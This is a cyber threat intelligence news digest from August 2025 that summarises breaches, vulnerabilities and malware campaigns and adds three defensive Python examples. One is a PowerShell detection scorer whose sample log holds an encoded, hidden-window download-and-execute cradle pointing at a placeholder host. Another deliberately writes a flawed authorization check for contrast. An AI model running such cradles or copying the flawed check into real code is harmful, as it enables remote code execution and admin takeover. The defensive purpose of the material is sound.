Cyber Threat Intelligence 12 August 2025
Healthcare Sector
- Breaches Are Up, Budgets Are Too, So Why Isn’t Healthcare Safer?
"A new report from Resilience outlines a growing cyber crisis in the U.S. healthcare sector, where ransomware attacks, vendor compromise, and human error continue to cause widespread disruption. In 2023, breaches exposed 168 million records, and the first half of 2025 has already seen extortion demands as high as $4 million. The sector remains vulnerable, despite large investments in security tools and insurance. The report highlights a major incident in February 2024, when Change Healthcare’s systems were hit by ransomware. That breach disrupted care across the country and exposed 190 million records. Resilience uses it as a case study of how third-party failures can affect the entire healthcare system."
https://www.helpnetsecurity.com/2025/08/11/resilience-top-healthcare-cybersecurity-risks/
Industrial Sector
- Utilities, Factories At Risk From Encryption Holes In Industrial Protocol
"Despite its promises, OPC UA, a standardized, open-source communication protocol often used in industrial settings as a replacement for VPNs, turns out to have a number of vulnerabilities, issues, and potential for exploits. Last week, Tom Tervoort, principal security specialist for Secura, hosted a session at DEF CON 33 dedicated to OPC UA (short for Open Platform Communications Unified Architecture), which was first introduced in 2006. The protocol includes its own cryptographic authentication and transport security layer, and is interoperable between different vendors."
https://www.darkreading.com/vulnerabilities-threats/utilities-factories-encryption-holes-industrial-protocol
Vulnerabilities
- Over 29,000 Exchange Servers Unpatched Against High-Severity Flaw
"Over 29,000 Exchange servers exposed online remain unpatched against a high-severity vulnerability that can let attackers move laterally in Microsoft cloud environments, potentially leading to complete domain compromise. The security flaw (tracked as CVE-2025-53786) helps threat actors who gain administrative access to on-premises Exchange servers to escalate privileges within the organization's connected cloud environment by forging or manipulating trusted tokens or API calls, without leaving easily detectable traces and making it hard to detect exploitation. CVE-2025-53786 affects Exchange Server 2016, Exchange Server 2019, and Microsoft Exchange Server Subscription Edition, which replaces the perpetual license model with a subscription-based one, in hybrid configurations."
https://www.bleepingcomputer.com/news/security/over-29-000-exchange-servers-unpatched-against-high-severity-flaw/
- New TETRA Radio Encryption Flaws Expose Law Enforcement Communications
"Cybersecurity researchers have discovered a fresh set of security issues in the Terrestrial Trunked Radio (TETRA) communications protocol, including in its proprietary end-to-end encryption (E2EE) mechanism, that expose the system to replay and brute-force attacks and even allow encrypted traffic to be decrypted. Details of the vulnerabilities – dubbed 2TETRA:2BURST – were presented at the Black Hat USA security conference last week by Midnight Blue researchers Carlo Meijer, Wouter Bokslag, and Jos Wetzels. TETRA is a European mobile radio standard that's widely used by law enforcement, military, transportation, utilities, and critical infrastructure operators. It was developed by the European Telecommunications Standards Institute (ETSI). It encompasses four encryption algorithms: TEA1, TEA2, TEA3, and TEA4."
https://thehackernews.com/2025/08/new-tetra-radio-encryption-flaws-expose.html
Malware
- Update WinRAR Tools Now: RomCom And Others Exploiting Zero-Day Vulnerability
"ESET researchers have discovered a previously unknown vulnerability in WinRAR, being exploited in the wild by Russia-aligned group RomCom. This is at least the third time that RomCom has been caught exploiting a significant zero-day vulnerability in the wild. Previous examples include the abuse of CVE-2023-36884 via Microsoft Word in June 2023, and the combined vulnerabilities assigned CVE‑2024‑9680 chained with another previously unknown vulnerability in Windows, CVE‑2024‑49039, targeting vulnerable versions of Firefox, Thunderbird, and the Tor Browser, leading to arbitrary code execution in the context of the logged-in user in October 2024."
https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/
https://www.bleepingcomputer.com/news/security/details-emerge-on-winrar-zero-day-attacks-that-infected-pcs-with-malware/
https://thehackernews.com/2025/08/winrar-zero-day-under-active.html
https://therecord.media/winrar-zero-day-exploited-romcom-paper-werewolf-goffee-hackers
https://www.infosecurity-magazine.com/news/winrar-zero-day-exploited-romcom/
https://www.securityweek.com/russian-hackers-exploited-winrar-zero-day-in-attacks-on-europe-canada/
https://www.helpnetsecurity.com/2025/08/11/winrar-zero-day-cve-2025-8088/
https://www.theregister.com/2025/08/11/russias_romcom_among_those_exploiting/
- Netherlands: Citrix Netscaler Flaw CVE-2025-6543 Exploited To Breach Orgs
"The Netherlands' National Cyber Security Centre (NCSC) is warning that a critical Citrix NetScaler vulnerability tracked as CVE-2025-6543 was exploited to breach "critical organizations" in the country. The critical flaw is a memory overflow bug that allows unintended control flow or a denial of service state on impacted devices. "Memory overflow vulnerability leading to unintended control flow and Denial of Service in NetScaler ADC and NetScaler Gateway when configured as Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server," explains Citrix's advisory."
https://www.bleepingcomputer.com/news/security/netherlands-citrix-netscaler-flaw-cve-2025-6543-exploited-to-breach-orgs/
https://www.bankinfosecurity.com/dutch-investigators-blame-multiple-threat-actors-on-hacks-a-29182
- The Rise Of Native Phishing: Microsoft 365 Apps Abused In Attacks
"Attackers don’t need exploits; they need TRUST. Changes in attack methods reflect changes in generations. Gen Z, a generation known for prioritizing ease and efficiency, is now entering the cybersecurity landscape on both sides. Some are protecting data, and others are stealing it. With the rise of AI and no-code platforms in attackers’ phishing toolkits, building trust and deceiving users has never been easier. Threat actors are blending default-trusted tools with free, legitimate services to bypass traditional security defenses and human suspicions."
https://www.bleepingcomputer.com/news/security/the-rise-of-native-phishing-microsoft-365-apps-abused-in-attacks/
- MuddyWater’s DarkBit Ransomware Cracked For Free Data Recovery
"Cybersecurity firm Profero cracked the encryption of the DarkBit ransomware gang's encryptors, allowing them to recover a victim's files for free without paying a ransom. This occurred in 2023 during an incident response handled by Profero experts, who were brought in to investigate a ransomware attack on one of their clients, which had encrypted multiple VMware ESXi servers. The timing of the cyberattack suggests that it was in retaliation for the 2023 drone strikes in Iran that targeted an ammunition factory belonging to the Iranian Defence Ministry."
https://www.bleepingcomputer.com/news/security/muddywaters-darkbit-ransomware-cracked-for-free-data-recovery/
- REvil Actor Accuses Russia Of Planning 2021 Kaseya Attack
"A convicted REvil affiliate accused the Russian government of planning the 2021 supply chain attack against Kaseya. Jon DiMaggio, chief intelligence strategist at Analyst1, and John Fokker, head of threat intelligence at Trellix, discussed the ransomware-as-a-service (RaaS) gang REvil during an Aug. 9 session at DEF CON 33. REvil is an infamous gang with a number of large-scale victims under its belt, including Acer and meat processing giant JBS S.A., but the talk covered REvil's most notorious strike: the July 2021 ransomware attack against Kaseya, which specialized in remote IT management software and services."
https://www.darkreading.com/cyberattacks-data-breaches/revil-actor-russia-planning-2021-kaseya-attack
- From ClickFix To Command: A Full PowerShell Attack Chain
"The FortiMail Workspace Security team recently identified a targeted intrusion campaign impacting multiple Israeli organizations. The adversary leveraged compromised internal email infrastructure to distribute phishing messages across the regional business landscape. These emails initiated a multi-stage, PowerShell-based infection chain that culminated in the delivery of a remote access trojan (RAT), executed entirely through PowerShell."
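The chain summarized above runs entirely through PowerShell, so process-creation telemetry is where it shows up. As an added example, not the Fortinet team's code or the campaign's own artifacts, the scorer below flags PowerShell launches carrying the indicators such chains commonly show: an encoded command (decoded so the inner script is scanned too), a hidden window, a policy bypass, a download cradle and Invoke-Expression. The log records, the weights and the assumption that a ClickFix lure is pasted into the Run dialog (making explorer.exe the parent) are constructed for this example and are not stated in the write-up.

```python
"""Added example: a scorer for PowerShell process-creation events with the
indicators a ClickFix-style chain commonly carries. Not the Fortinet team's
code; the log records, weights and parent-process assumption are constructed."""
import base64
import re

# Each indicator: name, case-insensitive regex, weight. Weights are constructed.
INDICATORS = [
    ("encoded_command", r"-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{8,}", 3),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden", 2),
    ("no_profile", r"-no(?:p|profile)\b", 1),
    ("bypass_policy", r"-e(?:p|x|xecutionpolicy)\s+bypass", 1),
    ("download_cradle", r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b", 3),
    ("invoke_expression", r"\biex\b|invoke-expression", 3),
]


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """event: {'image', 'parent', 'cmdline'} from process-creation telemetry.
    Returns (score, [indicator names])."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded:
        text += " " + decoded  # scan the inner script as well as the wrapper
    score, hits = 0, []
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, text, re.I):
            hits.append(name)
            score += weight
    # Assumption (commonly reported for ClickFix lures, not stated in the
    # summary): the user pastes the command into Win+R, so explorer.exe is the
    # parent rather than a script host, scheduler or admin console.
    if event["parent"].lower().endswith("explorer.exe"):
        hits.append("run_dialog_parent")
        score += 2
    return score, hits


def triage(events, threshold=6):
    """Events at or above the threshold, highest score first."""
    rows = []
    for e in events:
        s, h = score_event(e)
        if s >= threshold:
            rows.append({"score": s, "hits": h, "cmdline": e["cmdline"]})
    return sorted(rows, key=lambda r: -r["score"])


# Constructed sample telemetry. The payload is a generic cradle, not the campaign's.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": f"powershell -w hidden -nop -ep bypass -enc {ENCODED}"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\nightly-backup.ps1"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row["score"], row["hits"])
```

Decoding the encoded command before matching is the step that matters: the wrapper flags alone (hidden window, no profile) also appear in legitimate automation, while the cradle and Invoke-Expression live inside the base64 and are invisible to a pattern that only reads the outer command line.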
https://www.fortinet.com/blog/threat-research/clickfix-to-command-a-full-powershell-attack-chain
- Keys To The Kingdom: Erlang/OTP SSH Vulnerability Analysis And Exploits Observed In The Wild
"This article presents our observations of exploit attempts targeting CVE-2025-32433. This vulnerability allows unauthenticated remote code execution (RCE) in the Secure Shell (SSH) daemon (sshd) from certain versions of the Erlang programming language's Open Telecom Platform (OTP). Erlang/OTP sshd is widely used in critical infrastructure and operational technology (OT) networks. With a CVSS score of 10.0, CVE-2025-32433 enables unauthenticated clients to execute commands by sending SSH connection protocol messages (codes >= 80) to open SSH ports, which should only be processed after successful authentication. Vulnerable versions include Erlang/OTP prior to OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20. A patch is available in Erlang/OTP versions OTP-27.3.3, OTP-26.2.5.11, OTP-25.3.2.20 and later."
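A worked check for the flaw as summarized above, added here as an example; it is not code from the Unit 42 write-up or from the Erlang/OTP project. It compares a reported OTP version against the fixed releases the summary lists, models the server-side dispatch decision so the flaw (connection-protocol messages, codes 80 and above, handled before authentication) can be contrasted with the correct gate, and flags such messages in a constructed trace. Treating branches older than OTP-25 as unfixed is an assumption, as is the trace itself.

```python
"""Added example: not code from the Unit 42 write-up or the Erlang/OTP project.

Two checks for CVE-2025-32433 as the summary describes it. The fixed versions
are the ones the summary quotes; the message trace is constructed, and the
server model is a deliberate simplification of RFC 4253/4254 dispatch."""
import re

# First fixed release on each maintained branch, per the summary above.
FIXED = {27: (27, 3, 3), 26: (26, 2, 5, 11), 25: (25, 3, 2, 20)}


def parse_otp_version(text):
    """'OTP-26.2.5.11' -> (26, 2, 5, 11); 'Erlang/OTP 27.3' -> (27, 3)."""
    m = re.search(r"(\d+(?:\.\d+)+)", text)
    if not m:
        raise ValueError(f"no OTP version in {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def is_vulnerable_otp(text):
    """True if the version is older than the first fixed release on its branch.
    Assumption (not from the summary): branches older than OTP-25 received no
    fix and are treated as vulnerable; OTP-28 and later shipped after the fix."""
    v = parse_otp_version(text)
    if v[0] in FIXED:
        return v < FIXED[v[0]]  # tuple order: (26, 2, 5) < (26, 2, 5, 11)
    return v[0] < 25


# SSH message-number ranges (RFC 4250): 1-49 transport, 50-79 user auth,
# 80-127 connection protocol (channel open, exec/shell requests, ...).
SSH_MSG_USERAUTH_SUCCESS = 52
CONNECTION_PROTOCOL_MIN = 80


class SshServerModel:
    """Minimal model of the server-side dispatch decision.

    enforce_auth=False reproduces the flaw described above: connection-protocol
    messages are handled regardless of authentication state."""

    def __init__(self, enforce_auth=True):
        self.enforce_auth = enforce_auth
        self.authenticated = False
        self.dispatched = []

    def complete_auth(self):
        # The point at which a real server sends SSH_MSG_USERAUTH_SUCCESS.
        self.authenticated = True

    def handle(self, code):
        if code < CONNECTION_PROTOCOL_MIN:
            return "pre-connection"
        if self.enforce_auth and not self.authenticated:
            return "rejected"  # correct behaviour: disconnect or ignore
        self.dispatched.append(code)
        return "dispatched"  # vulnerable when reached before authentication


def preauth_connection_msgs(trace):
    """From an instrumented server's (direction, code) trace, return the client
    connection-protocol codes seen before the server sent USERAUTH_SUCCESS."""
    flagged, authed = [], False
    for direction, code in trace:
        if direction == "s2c" and code == SSH_MSG_USERAUTH_SUCCESS:
            authed = True
        elif direction == "c2s" and code >= CONNECTION_PROTOCOL_MIN and not authed:
            flagged.append(code)
    return flagged


# Constructed trace: key exchange (20 KEXINIT, 21 NEWKEYS, 5/6 SERVICE_REQUEST/
# ACCEPT), then CHANNEL_OPEN (90) and CHANNEL_REQUEST (98) with no user auth.
SUSPICIOUS_TRACE = [("c2s", 20), ("s2c", 20), ("c2s", 21), ("s2c", 21),
                    ("c2s", 5), ("s2c", 6), ("c2s", 90), ("c2s", 98)]

if __name__ == "__main__":
    print(is_vulnerable_otp("OTP-26.2.5.10"))         # True
    print(preauth_connection_msgs(SUSPICIOUS_TRACE))  # [90, 98]
    flawed, fixed = SshServerModel(enforce_auth=False), SshServerModel()
    print(flawed.handle(90), fixed.handle(90))        # dispatched rejected
```

The version check is the quick triage for an inventory; the dispatch model is the property to verify in any SSH server, Erlang or otherwise: nothing numbered 80 or above may be acted on until the server has itself emitted USERAUTH_SUCCESS on that connection.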
https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/
https://thehackernews.com/2025/08/researchers-spot-surge-in-erlangotp-ssh.html
- MedusaLocker Ransomware Group Is Looking For Pentesters
"MedusaLocker is a ransomware strain that was first observed in late 2019. It encrypts files on infected systems and demands a ransom, usually in cryptocurrency, for their decryption. The group operates as Ransomware-as-a-Service (RaaS), meaning affiliates can rent the ransomware in exchange for a cut of the profits. The MedusaLocker ransomware gang announced on its Tor data leak site that it is looking for new pentesters."
https://securityaffairs.com/181033/hacking/medusalocker-ransomware-group-is-looking-for-pentesters.html
- Dissecting The CastleBot Malware-As-a-Service Operation
"IBM X-Force has been investigating a newly emerging malware framework named CastleBot. The malware is believed to be part of a Malware-as-a-Service (MaaS) operation and is specifically designed for flexible malware deployment. CastleBot is currently used by cyber criminals to deliver everything from infostealers to backdoors like NetSupport and WarmCookie, which have been linked to ransomware attacks. What makes CastleBot particularly concerning is how it's being distributed: most often through trojanized software installers downloaded from fake websites, luring unsuspecting users into launching the infection themselves. This technique is part of a growing trend X-Force is observing. It is often enabled through SEO poisoning, which causes malicious pages to rank higher in search engines than legitimate software distributors."
https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation
Breaches/Hacks/Leaks
- Connex Credit Union Data Breach Impacts 172,000 Members
"Connex, one of Connecticut's largest credit unions, warned tens of thousands of members that unknown attackers had stolen their personal and financial information after breaching its systems in early June. Founded in 1940, this member-owned organization is a non-profit with over $1 billion in assets, providing banking, insurance, and credit card services to more than 70,000 members across eight branches throughout the greater New Haven area, including New Haven, Hartford, Middlesex, and Fairfield counties. In data breach notification letters sent to affected individuals via U.S. Mail and filed with the office of Maine's Attorney General, Connex states that it discovered the incident on June 3, one day after its network was breached."
https://www.bleepingcomputer.com/news/security/connex-credit-union-discloses-data-breach-impacting-172-000-people/
https://www.infosecurity-magazine.com/news/connex-credit-union-breach/
https://www.securityweek.com/connex-credit-union-data-breach-impacts-172000-people/
- Online Portal Exposed Car And Personal Data, Allowed Anyone To Remotely Unlock Cars
"A carmaker’s online dealership portal has been found leaking the private information and vehicle data of its customers. This also meant that anyone with access could remotely break into a car. Researcher Eaton Zveare shared his discovery with TechCrunch. Although he said he has chosen not to disclose the vendor’s name, he revealed that it is a well-known automaker with several popular sub-brands and more than 1,000 dealerships across the United States. Zveare says it wasn’t easy to find the flaw, but once he did, it allowed him to modify the code at the portal’s login page so he could bypass the login security checks. This permitted him to create a new national administrator account."
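The summary describes a login page whose checks could be edited in the browser until an administrator account could be created. As an added example, not the researcher's or the automaker's code, here is the server-side pattern that removes that class of bypass: a deliberately flawed handler that trusts a role asserted by the client, next to one that derives the caller's identity from a server-signed session and looks the role up on the server. The account names, the key and the requests are constructed for the example.

```python
"""Added example: server-side authorization that a client cannot edit away.
Not the researcher's or the automaker's code; the names, key and requests
are constructed."""
import hashlib
import hmac
import json

# Constructed server-side secret; in production it comes from a secret store.
SERVER_SECRET = b"constructed-demo-key-rotate-in-production"


def sample_accounts():
    """Constructed account table: the server's source of truth for roles."""
    return {"dealer42": "dealer", "hq-admin": "national_admin"}


def create_admin_vulnerable(accounts, request):
    """Flawed: trusts a role the client sends about itself, which is what a
    portal whose only gate is JavaScript on the login page amounts to."""
    if request.get("role") != "national_admin":
        return 403
    accounts[request["new_user"]] = "national_admin"
    return 201


def issue_session(user):
    """Server-minted token: JSON payload plus HMAC-SHA256 over it."""
    payload = json.dumps({"user": user}, separators=(",", ":")).encode()
    sig = hmac.new(SERVER_SECRET, payload, hashlib.sha256).hexdigest()
    return payload.hex() + "." + sig


def verify_session(token):
    """Return the user named by a valid token, or None for anything tampered."""
    try:
        payload_hex, sig = token.split(".", 1)
        payload = bytes.fromhex(payload_hex)
    except ValueError:
        return None
    expected = hmac.new(SERVER_SECRET, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None
    return json.loads(payload).get("user")


def create_admin_hardened(accounts, request, token):
    """Identity comes from the signed session, the role from the server's own
    table. Nothing the client edits in the page changes either."""
    user = verify_session(token)
    if user is None:
        return 401
    if accounts.get(user) != "national_admin":
        return 403
    accounts[request["new_user"]] = "national_admin"
    return 201


if __name__ == "__main__":
    acc = sample_accounts()
    # A client that edited its own role gets through the flawed path.
    print(create_admin_vulnerable(acc, {"role": "national_admin", "new_user": "attacker"}))  # 201
    acc = sample_accounts()
    # The same client, holding only a dealer session, is refused by the hardened one.
    print(create_admin_hardened(acc, {"new_user": "attacker"}, issue_session("dealer42")))   # 403
```

The role never travels in the request at all in the hardened path; the only client-supplied input that affects the decision is the token, and it is rejected if a single byte of payload or signature changes.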
https://www.malwarebytes.com/blog/news/2025/08/online-portal-exposed-car-and-personal-data-allowed-anyone-to-remotely-unlock-cars
https://www.securityweek.com/flaws-in-major-automakers-dealership-systems-allowed-car-hacking-personal-data-theft/
https://hackread.com/carmaker-portal-flaw-hackers-unlock-cars-steal-data/
- Ransomware Gang Claims Attack On St. Paul City Government
"A ransomware gang the FBI warned the public about last month is claiming to have carried out a cyberattack that has disrupted large parts of St. Paul’s city government. The Interlock ransomware gang added the Minnesota city to its leak site on Monday, claiming to have stolen 43 gigabytes of data. No payment deadline or ransom demand was listed. City and state officials did not respond to requests for comment. It is unclear what data was stolen in the attack but Mayor Melvin Carter said during a press conference on July 29 that the city is most concerned about data related to government employees. Resident data is held in a cloud-based application and was not impacted by the ransomware attack, city officials have said."
https://therecord.media/ransomware-gang-behind-minnesota-attack
General News
- Estimating The Societal Cost Of DDoS Attacks: A Dual-Lens Model For National Impact Assessment
"A new discussion paper, “Estimating the Societal Cost of DDoS Attacks: A Dual-Lens Model for National Impact Assessment,” authored by Carlos Alvarez, Director of the Hub for the Americas and the Caribbean, has been released by the Global Forum on Cyber Expertise (GFCE), aiming to spark crucial conversations within the international cybersecurity community. This document represents the GFCE’s commitment to providing thought leadership in the field, as well as its intent to foster dialogue and collaboration among diverse stakeholders to address the evolving nature of cyber threats."
https://thegfce.org/news/estimating-the-societal-cost-of-ddos-attacks-a-dual-lens-model-for-national-impact-assessment/
https://thegfce.org/wp-content/uploads/2025/08/Societal-Cost-DDoS-Attacks-Carlos-Alvarez.pdf
- New Data Reveals July’s Worst Ransomware Groups And Attack Surges
"From critical infrastructure to classrooms, no sector is being spared. In July 2025, cyber attacks surged across nearly every industry and region, marking a sharp escalation in both scale and sophistication. This blog unpacks the latest global trends in cyber attacks, including:"
https://blog.checkpoint.com/research/global-cyber-threats-july-snapshot-of-an-accelerating-crisis/
- Researchers Determine Old Vulnerabilities Pose Real-World Threat To Sensitive Data In Public Clouds
"Using a seven-year-old vulnerability, researchers said they were able to realistically leak private data from public clouds, suggesting that a “lack of concern” about such supposedly impractical attacks is misguided, according to a presentation delivered Monday. The anonymous researchers presented their findings at a hacker conference, WHY2025, in the Netherlands, and they leaned on the kind of “transient execution” vulnerabilities that attracted attention in 2018 with high-profile Intel chip flaw revelations, one of which was known as Spectre."
https://cyberscoop.com/cloud-security-l1tf-reloaded-public-cloud-vulnerability-exploit/
https://openreview.net/forum?id=4tDNvQe2G0
- From Legacy To SaaS: Why Complexity Is The Enemy Of Enterprise Security
"In this Help Net Security interview, Robert Buljevic, Technology Consultant at Bridge IT, discusses how the coexistence of legacy systems and SaaS applications is changing the way organizations approach security. He explains why finding the right balance between old and new technology is essential for maintaining protection."
https://www.helpnetsecurity.com/2025/08/11/robert-buljevic-bridge-it-legacy-saas-security/
- Pentesting Is Now Central To CISO Strategy
"Security leaders are rethinking their approach to cybersecurity as digital supply chains expand and generative AI becomes embedded in critical systems. A recent survey of 225 security leaders conducted by Emerald Research found that 68% are concerned about the risks posed by third-party software and components. While most say they are meeting regulatory requirements, 60% admit attackers are evolving too fast to maintain resilience. The report highlights a growing tension between compliance and actual security. As one section states, “Security leaders are calling for stronger controls, faster remediation, and greater visibility into emerging AI risks.” Many now view cybersecurity as a strategic business issue rather than just a technical one."
https://www.helpnetsecurity.com/2025/08/11/pentesting-for-cisos/
- UK Red Teamers “Deeply Skeptical” Of AI
"Offensive cybersecurity experts have largely failed to integrate AI into their services, expressing significant reservations about its possible benefits, according to a new government study. Back in December 2024, the Department for Science, Innovation and Technology (DSIT) commissioned Prism Infosec to research how red team specialists are integrating emerging technologies into their products and services. It found that cloud adoption has had a far greater impact on the types of these services being offered than AI."
https://www.infosecurity-magazine.com/news/uk-red-teamers-deeply-skeptical-of/
- Managing The Trust-Risk Equation In AI: Predicting Hallucinations Before They Strike
"Hallucinations are a continuing and inevitable problem for LLMs because they are a byproduct of operation rather than a bug in design. But what if we knew when and why they happen? “Hallucinations – the generation of plausible but false, fabricated, or nonsensical content – are not just common, they are mathematically unavoidable in all computable LLMs… hallucinations are not bugs, they are inevitable byproducts of how LLMs are built, and for enterprise applications, that’s a death knell,” wrote Srini Pagidyala (co-founder of Aigo AI) on LinkedIn."
https://www.securityweek.com/managing-the-trust-risk-equation-in-ai-predicting-hallucinations-before-they-strike/
- Red Teams Are Safe From Robots For Now, As AI Makes Better Shield Than Spear
"At the opening of Black Hat, the largest security shindig in the Hacker Summer Camp week ahead of DEF CON and BSides, the opening keynote speaker suggested the current state of AI slightly favors defenders over attackers, but he warned that was not a given for much longer. "I do believe that AI is the key [in security] because that's one of the few fields where defenders are ahead of the attackers," Mikko Hyppönen, outgoing chief research officer for Finnish security firm WithSecure, told the audience."
https://www.theregister.com/2025/08/11/ai_security_offense_defense/
- US Scrambles To Recoup $1M+ Nicked By NORKs
"The US Department of Justice is trying to recoup around $1 million that three IT specialists secretly working for the North Korean government allegedly stole from a New York company. Bong Chee Shen was first in the door, as the unnamed company hired him in December 2022. He then recommended two other devs to join him to work on the company's cryptocurrency wallet scheme. All three were fired in May 2024 for poor work performance and difficulties communicating with coworkers. The trio would also regularly claim that their microphones weren't working while on video calls."
https://www.theregister.com/2025/08/11/us_tries_to_recover_1m/
- Your CV Is Not Fit For The 21st Century – Time To Get It Up To Scratch
"The job market is queasy and since you're reading this, you need to upgrade your CV. It's going to require some work to game the poorly trained AIs now doing so much of the heavy lifting. I know you don't want to, but it's best to think of this as dealing with a buggy lump of undocumented code, because frankly that's what is between you and your next job."
https://www.theregister.com/2025/08/11/feature_tech_cv_updates/
Reference
Electronic Transactions Development Agency (ETDA)